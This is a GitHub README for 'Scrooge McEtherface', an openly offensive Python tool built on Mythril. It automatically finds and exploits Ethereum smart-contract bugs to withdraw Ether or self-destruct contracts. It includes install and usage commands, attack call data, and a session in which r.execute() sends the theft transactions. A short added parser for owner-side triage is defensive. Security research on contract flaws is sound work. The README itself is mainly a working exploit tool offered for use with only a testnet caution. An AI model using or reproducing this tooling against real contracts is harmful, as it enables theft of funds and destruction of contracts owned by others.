Attack tool that loots Ether from vulnerable smart contracts
Type Name Latest commit message Commit time
scmf Add __init__.py Jul 6, 2019
static
.gitignore Add venv local folder in gitignore. Jul 7, 2019
LICENSE Add license Nov 27, 2018
README.md Update README.md Jul 2, 2019
config.ini.example Add more config options Jul 6, 2019
epic.py Initial commit Nov 27, 2018
requirements.txt Make compatible with newer Mythril Jun 23, 2019
scrooge Formatting Jul 6, 2019

README.md

Scrooge McEtherface

Scrooge McEtherface is an Ethereum auto-looter based on Mythril. It exploits instances of Ether theft and self-destruction caused by various issues including integer arithmetic bugs, exposed initialization functions and others. Use at your own peril.

Installation

$ git clone https://github.com/b-mueller/scrooge-mcetherface
$ cd scrooge-mcetherface
$ pip install -r requirements.txt
$ cp config.ini.example config.ini

Python 3.5 or higher is required. Set up your RPC URL and Ethereum address in config.ini. The easiest way to test is using Ganache.

The symbolic_tx_count parameter sets a bound on the number of transactions being explored.

Usage

Start a session by running:

$ ./scrooge <address>

This will analyze the smart contract at the target address, output the vulnerabilities found and spawn a Python shell:

$ ./scrooge 0x3b1d02336205d1f22961c0f462abfe083e515921
Scrooge McEtherface at your service.
Analyzing 0x3B1D02336205D1F22961C0F462aBfE083E515921 over 2 transactions.
Found 2 attacks:

ATTACK 0: Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

ATTACK 1: The contract can be killed by anyone.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0xc96cd46f , call value: 0x0

Python 3.6.3 (default, Jan  8 2018, 08:49:07) 
(InteractiveConsole)
>>> 

You now have access to a list of Raid objects, each of which represents a sequence of transactions that exploit a bug.

>>> r = raids[0]
>>> print(r.pretty()) 
Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

Use execute() to send the transactions to the blockchain:

>>> r.execute()
Transaction sent successfully, tx-hash: 0x93f4a72d3ce897c4525a336249f32ae0704f6c0fed6b7b935801d5c7e68ca4b9. Waiting for transaction to be mined...
Transaction sent successfully, tx-hash: 0x21d1e77f6f629377ac227ec2e33f78b1d073c175826c0b161265121a74c2393b. Waiting for transaction to be mined...
True

This returns True if Ether was successfully withdrawn from the target account.
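
For triage on the contract owner's side, the report printed at the start of a session can be parsed into structured findings so that the function selectors involved can be matched against the contract's ABI and reviewed for missing access checks. This is an added example, not part of the Scrooge McEtherface code base; `parse_report` and `shared_selectors` are hypothetical helper names, and the embedded report is the one from the session shown above.

```python
import re

# Sample input: the report text from the session above, embedded so this runs offline.
REPORT = """\
ATTACK 0: Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

ATTACK 1: The contract can be killed by anyone.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0xc96cd46f , call value: 0x0
"""

HEADER = re.compile(r"^ATTACK (\d+): (.+)$")
STEP = re.compile(
    r"^\s+(\d+): Call data: (0x[0-9a-fA-F]{8})\s*([0-9a-fA-F]*)\s*, "
    r"call value: (0x[0-9a-fA-F]+)\s*$"
)

def parse_report(text):
    """Parse the 'ATTACK n:' report into a list of findings with decoded steps."""
    findings = []
    for line in text.splitlines():
        header = HEADER.match(line)
        step = STEP.match(line)
        if header:
            findings.append({"id": int(header.group(1)),
                             "title": header.group(2), "steps": []})
        elif step and findings:
            args = step.group(3)
            findings[-1]["steps"].append({
                "selector": step.group(2).lower(),
                # ABI arguments are 32-byte words, i.e. 64 hex characters each.
                "words": [args[i:i + 64] for i in range(0, len(args), 64)],
                "value": int(step.group(4), 16),
            })
    return findings

def shared_selectors(findings):
    """Selectors used by every finding: a common precondition to review first
    (a heuristic assumed by this example, not something the tool reports)."""
    sets = [{s["selector"] for s in f["steps"]} for f in findings]
    return sorted(set.intersection(*sets)) if sets else []

if __name__ == "__main__":
    found = parse_report(REPORT)
    for f in found:
        print(f["id"], f["title"], [s["selector"] for s in f["steps"]])
    print("shared:", shared_selectors(found))
```
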

Support

No support for this tool exists whatsoever.

Important Notes

  • This is a weekend project that hasn't been extensively tested. Don't use it on mainnet.
  • Act responsibly and don't accidentally kill anyone else's contract.
  • Use only on testnet and at your own risk.